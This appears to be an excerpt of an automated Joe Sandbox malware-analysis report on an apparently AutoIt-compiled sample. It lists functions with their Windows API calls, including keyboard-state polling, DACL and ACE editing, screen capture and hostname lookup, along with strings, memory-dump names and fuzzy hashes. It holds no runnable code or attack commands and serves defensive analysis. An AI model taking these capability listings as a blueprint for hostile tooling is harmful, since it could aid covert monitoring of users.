Opcode Fuzzy Hash: 6c35ef5dca9f99e6cb0af7a26d50e1f9ff9f79798ecb4c0d7d25b11631660c77
Instruction Fuzzy Hash: 0C610972A04316AFDB105F2CEC41B6AB7A5EF21325F184116E8C1DB2D1EB79D940C772

Function 00D6DB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00D6DC7B
_wcscat.LIBCMT ref: 00D6DC93
_wcscat.LIBCMT ref: 00D6DCA5
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00D6DCBA
SetCurrentDirectoryW.KERNEL32(?), ref: 00D6DCCE
GetFileAttributesW.KERNEL32(?), ref: 00D6DCE6
SetFileAttributesW.KERNEL32(?,00000000), ref: 00D6DD00
SetCurrentDirectoryW.KERNEL32(?), ref: 00D6DD12

Strings

*.*, xrefs: 00D6DD51

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 815d8296fabb30efa41cef334b77a71b631bf96f24dfb62974857dc984f75efc
Instruction ID: fca1ea38d65f749960a30b95cf0b1b4193ce063224cb697673b4d4b045f54622
Opcode Fuzzy Hash: 815d8296fabb30efa41cef334b77a71b631bf96f24dfb62974857dc984f75efc
Instruction Fuzzy Hash: EB819371A043459FCB24EF28D8459AAB7E9FF88314F19882EF889C7251E631D944CB72

Function 00D8C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D02612: GetWindowLongW.USER32(?,000000EB), ref: 00D02623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00D8C4EC
GetFocus.USER32 ref: 00D8C4FC
GetDlgCtrlID.USER32(00000000), ref: 00D8C507
_memset.LIBCMT ref: 00D8C632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00D8C65D
GetMenuItemCount.USER32(?), ref: 00D8C67D
GetMenuItemID.USER32(?,00000000), ref: 00D8C690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00D8C6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00D8C70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00D8C744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00D8C779

Strings

0, xrefs: 00D8C62A

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 10f310c181b5133794a44e071a277c1098c2b16c2f06c0a424d8be32fe6aa04e
Instruction ID: b4cb4996ffdb1c13b9bd5b4158f06bfaf7dff99892aac7bda0e179bc0d7faba8
Opcode Fuzzy Hash: 10f310c181b5133794a44e071a277c1098c2b16c2f06c0a424d8be32fe6aa04e
Instruction Fuzzy Hash: 1F816A70218305EFDB10EF24C985A6BBBE8FB88314F14592DF995972A1D770E905CBB2

Function 00D583F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D58766
Part of subcall function 00D5874A: GetLastError.KERNEL32(?,00D5822A,?,?,?), ref: 00D58770
Part of subcall function 00D5874A: GetProcessHeap.KERNEL32(00000008,?,?,00D5822A,?,?,?), ref: 00D5877F
Part of subcall function 00D5874A: HeapAlloc.KERNEL32(00000000,?,00D5822A,?,?,?), ref: 00D58786
Part of subcall function 00D5874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D5879D

Part of subcall function 00D587E7: GetProcessHeap.KERNEL32(00000008,00D58240,00000000,00000000,?,00D58240,?), ref: 00D587F3
Part of subcall function 00D587E7: HeapAlloc.KERNEL32(00000000,?,00D58240,?), ref: 00D587FA
Part of subcall function 00D587E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00D58240,?), ref: 00D5880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D58458
_memset.LIBCMT ref: 00D5846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00D5848C
GetLengthSid.ADVAPI32(?), ref: 00D5849D
GetAce.ADVAPI32(?,00000000,?), ref: 00D584DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00D584F6
GetLengthSid.ADVAPI32(?), ref: 00D58513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00D58522
HeapAlloc.KERNEL32(00000000), ref: 00D58529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00D5854A
CopySid.ADVAPI32(00000000), ref: 00D58551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00D58582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00D585A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00D585BC

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 54e7781208542044f78f2856d0bcc3b2ca4fece769d0c8d0fd7817383e9575eb
Instruction ID: 54f053f65704b78ee7ddfe82ae6a1fbdbf356779a6f1c43e8dc2e824c7a27c43
Opcode Fuzzy Hash: 54e7781208542044f78f2856d0bcc3b2ca4fece769d0c8d0fd7817383e9575eb
Instruction Fuzzy Hash: C661167190020AAFDF109FA4DC45AAEBBB9FF04306F148169ED15E7291EB319A19DF70

Function 00D7762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00D776A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00D776AE
CreateCompatibleDC.GDI32(?), ref: 00D776BA
SelectObject.GDI32(00000000,?), ref: 00D776C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00D7771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00D77757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00D7777B
SelectObject.GDI32(00000006,?), ref: 00D77783
DeleteObject.GDI32(?), ref: 00D7778C
DeleteDC.GDI32(00000006), ref: 00D77793
ReleaseDC.USER32(00000000,?), ref: 00D7779E

Strings

(, xrefs: 00D77723

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: f6a990d4d2ceac7b7236e87e7d8aa66cbbaaa68bea4d250eee031244df6a5b14
Instruction ID: e51ea758d41bc2221c8ca425e994d5782d9d52023485ae390691c5d885fbbe03
Opcode Fuzzy Hash: f6a990d4d2ceac7b7236e87e7d8aa66cbbaaa68bea4d250eee031244df6a5b14
Instruction Fuzzy Hash: 7E512875904309EFCB15CFA8CC85EAEBBB9EF48710F14852DE949D7350D631A940CB60

Function 00D6A0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00D8FB78), ref: 00D6A0FC

Part of subcall function 00D07F41: _memmove.LIBCMT ref: 00D07F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 00D6A11E
__swprintf.LIBCMT ref: 00D6A177
__swprintf.LIBCMT ref: 00D6A190
_wprintf.LIBCMT ref: 00D6A246
_wprintf.LIBCMT ref: 00D6A264

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00D6A241
Error: , xrefs: 00D6A20E
"%s" (%d) : ==> %s:, xrefs: 00D6A25F
^ ERROR, xrefs: 00D6A1E8
Line %d (File "%s"):, xrefs: 00D6A171, 00D6A18A

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: fb189d0081b337485b6fd33a6a420f1654d146fad65f20673aedfb3b31df52b2
Instruction ID: a513912975dff2075f92c644a927d86572487e26431b2f130693d594baf984c1
Opcode Fuzzy Hash: fb189d0081b337485b6fd33a6a420f1654d146fad65f20673aedfb3b31df52b2
Instruction Fuzzy Hash: 2F516C7190020AABCF15EBA4CD92EEEB779EF18300F140165B509B61A1EB356F58CFB1

Function 00D06BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00D20B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00D06C6C,?,00008000), ref: 00D20BB7

Part of subcall function 00D048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D048A1,?,?,00D037C0,?), ref: 00D048CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00D06D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 00D06E5A

Part of subcall function 00D059CD: _wcscpy.LIBCMT ref: 00D05A05

Part of subcall function 00D2387D: _iswctype.LIBCMT ref: 00D23885

Strings

Error opening the file, xrefs: 00D3E866, 00D3E8E1
>>>AUTOIT SCRIPT<<<, xrefs: 00D3E8BF
AU3!, xrefs: 00D06CC1
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00D3E84A
EA06, xrefs: 00D3E87B
Bad directive syntax error, xrefs: 00D3EBC6
Unterminated string, xrefs: 00D3EC0D

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 41be9222d2d7fcbdcf44f556c75339ed5ec57dbf46316f0677f418ed32e52534
Instruction ID: 942b42ef460a3e484c240340751e5ee1e3df7e3c15776b6291ed3d6a210fefad
Opcode Fuzzy Hash: 41be9222d2d7fcbdcf44f556c75339ed5ec57dbf46316f0677f418ed32e52534
Instruction Fuzzy Hash: E30237715083419FC724EF24D881AAFBBE5EF98354F14491DF88A972A1DB30E949CB72

Function 00D045DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D045F9
GetMenuItemCount.USER32(00DC6890), ref: 00D3D7CD
GetMenuItemCount.USER32(00DC6890), ref: 00D3D87D
GetCursorPos.USER32(?), ref: 00D3D8C1
SetForegroundWindow.USER32(00000000), ref: 00D3D8CA
TrackPopupMenuEx.USER32(00DC6890,00000000,?,00000000,00000000,00000000), ref: 00D3D8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00D3D8E9

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: a148bdeda4c55c0d275e454a4b4aa4650c624400a4cb9486634564c8e035d2d9
Instruction ID: 14d7268d079f53ffef1ff8f9d0a549cdc85ca7bac27839317deab76c7eae2605
Opcode Fuzzy Hash: a148bdeda4c55c0d275e454a4b4aa4650c624400a4cb9486634564c8e035d2d9
Instruction Fuzzy Hash: 2E71E8B0600605BFEB219F54EC85FAABF66FF05364F244216F619A61E1C7B1A810DFB0

Function 00D810A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D80038,?,?), ref: 00D810BC

Strings

HKLM, xrefs: 00D8113A
HKCR, xrefs: 00D81164
HKEY_CLASSES_ROOT, xrefs: 00D8114F
HKU, xrefs: 00D811CE
HKCU, xrefs: 00D811AC
HKEY_USERS, xrefs: 00D811BD
HKEY_CURRENT_USER, xrefs: 00D8119B
HKEY_LOCAL_MACHINE, xrefs: 00D81125
HKCC, xrefs: 00D8118A
HKEY_CURRENT_CONFIG, xrefs: 00D81179

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: ea8374b01c539cb30032ae0b2961a46a8248888f02c3ee30a169e4a08ad62c74
Instruction ID: e83a7958fb5fe5e96f1227dad45a5f8f59f7fe6ed54095bfeaa85c21b888d556
Opcode Fuzzy Hash: ea8374b01c539cb30032ae0b2961a46a8248888f02c3ee30a169e4a08ad62c74
Instruction Fuzzy Hash: 5C41677450135ACFCF10FF94E892AEA3B28FF21354F544465EC925B292DB70A91ACBB0

Function 00D65569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00D07D2C: _memmove.LIBCMT ref: 00D07D66

Part of subcall function 00D07A84: _memmove.LIBCMT ref: 00D07B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00D655D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00D655E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D655F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00D6560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00D6561C

Strings

play PlayMe wait, xrefs: 00D65606
status PlayMe mode, xrefs: 00D655CD
close PlayMe, xrefs: 00D655E3, 00D65610
open , xrefs: 00D65581
alias PlayMe, xrefs: 00D655AB
play PlayMe, xrefs: 00D65617

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: c871672e706d996c88335cc73b7aeabce97ed1db220cb6e0df4e2605b074a15f
Instruction ID: de2cd18a991f3aa9a93066feea691dd788d358c185437852755009f371aa888d
Opcode Fuzzy Hash: c871672e706d996c88335cc73b7aeabce97ed1db220cb6e0df4e2605b074a15f
Instruction Fuzzy Hash: EA11C830A5015ABDD720F7A9DC4ADFF7BBCEF95B00F440429B406961D5DE601D49C5B1

Function 00D648F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00D6490E
gethostname.WSOCK32(?,00000100), ref: 00D64928
gethostbyname.WSOCK32(?), ref: 00D64935
_wcscpy.LIBCMT ref: 00D6495D
_memmove.LIBCMT ref: 00D64970
inet_ntoa.WSOCK32(?), ref: 00D6497B
_strcat.LIBCMT ref: 00D64989
_wcscpy.LIBCMT ref: 00D649A0
WSACleanup.WSOCK32 ref: 00D649AE
_wcscpy.LIBCMT ref: 00D649BC

Strings

0.0.0.0, xrefs: 00D64957

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 41d37c9ac1ff337b6135e9c8aa6e99dad64877c47256b1f768c50df8c0df8976
Instruction ID: 1bb468b3ee64d1c894c336ad7810e5b37da6e87b5d8808a9f4638ca75b2e7e84
Opcode Fuzzy Hash: 41d37c9ac1ff337b6135e9c8aa6e99dad64877c47256b1f768c50df8c0df8976
Instruction Fuzzy Hash: A0110F31904229ABDB20AB24AD4AEEB77BCDF10720F1401BAF448D2191EF709AC18B71

Function 00D65217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00D6521C

Part of subcall function 00D20719: timeGetTime.WINMM(?,75C0B400,00D10FF9), ref: 00D2071D

Sleep.KERNEL32(0000000A), ref: 00D65248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00D6526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00D6528E
SetActiveWindow.USER32 ref: 00D652AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00D652BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 00D652DA
Sleep.KERNEL32(000000FA), ref: 00D652E5
IsWindow.USER32 ref: 00D652F1
EndDialog.USER32(00000000), ref: 00D65302

Strings

BUTTON, xrefs: 00D65280

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 1bdb070651367b0085c8caee7d653e01c262b9a74f03001b568c5aa684714f22
Instruction ID: 9f44af6c72e5e22be8fa566b7b99a8d75f371d7d7607e3aa729e680be5e36233
Opcode Fuzzy Hash: 1bdb070651367b0085c8caee7d653e01c262b9a74f03001b568c5aa684714f22
Instruction Fuzzy Hash: 0021CD70224707AFE7005B30FC89F2A7B69EB59786F141528F002C23B5DB619C809B36

Function 00D6D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00D09997: __itow.LIBCMT ref: 00D099C2
Part of subcall function 00D09997: __swprintf.LIBCMT ref: 00D09A0C

CoInitialize.OLE32(00000000), ref: 00D6D855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00D6D8E8
SHGetDesktopFolder.SHELL32(?), ref: 00D6D8FC
CoCreateInstance.OLE32(00D92D7C,00000000,00000001,00DBA89C,?), ref: 00D6D948
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00D6D9B7
CoTaskMemFree.OLE32(?,?), ref: 00D6DA0F
_memset.LIBCMT ref: 00D6DA4C
SHBrowseForFolderW.SHELL32(?), ref: 00D6DA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00D6DAAB
CoTaskMemFree.OLE32(00000000), ref: 00D6DAB2
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00D6DAE9
CoUninitialize.OLE32(00000001,00000000), ref: 00D6DAEB

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: f47844b30cb078d71c7bbf68c90b616ba304624100b4865bd88389afdf1a1f6c
Instruction ID: 77932663b750b95eeb9c2406d5ff682250c376eea9c476ab9bf2f5c1b5078931
Opcode Fuzzy Hash: f47844b30cb078d71c7bbf68c90b616ba304624100b4865bd88389afdf1a1f6c
Instruction Fuzzy Hash: 86B1EE75A00109AFDB04DFA5D898EAEBBF9FF48314B148459F909EB251DB30ED45CB60

Function 00D6052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00D605A7
SetKeyboardState.USER32(?), ref: 00D60612
GetAsyncKeyState.USER32(000000A0), ref: 00D60632
GetKeyState.USER32(000000A0), ref: 00D60649
GetAsyncKeyState.USER32(000000A1), ref: 00D60678
GetKeyState.USER32(000000A1), ref: 00D60689
GetAsyncKeyState.USER32(00000011), ref: 00D606B5
GetKeyState.USER32(00000011), ref: 00D606C3
GetAsyncKeyState.USER32(00000012), ref: 00D606EC
GetKeyState.USER32(00000012), ref: 00D606FA
GetAsyncKeyState.USER32(0000005B), ref: 00D60723
GetKeyState.USER32(0000005B), ref: 00D60731

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 041f184bacf82939a345f77a78bbe734dbb1048d116c161b0311a857e517331b
Instruction ID: 14874333a179a357cfdb5f7c7c7cddfaf6203f2d339e0f377b5e8b1ad07f494b
Opcode Fuzzy Hash: 041f184bacf82939a345f77a78bbe734dbb1048d116c161b0311a857e517331b
Instruction Fuzzy Hash: 3451B674A047882BFB35DBA088557EBBFB4DF11380F0C459AD5C25B5C2DA64AA8CCB71

Function 00D5C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00D5C746
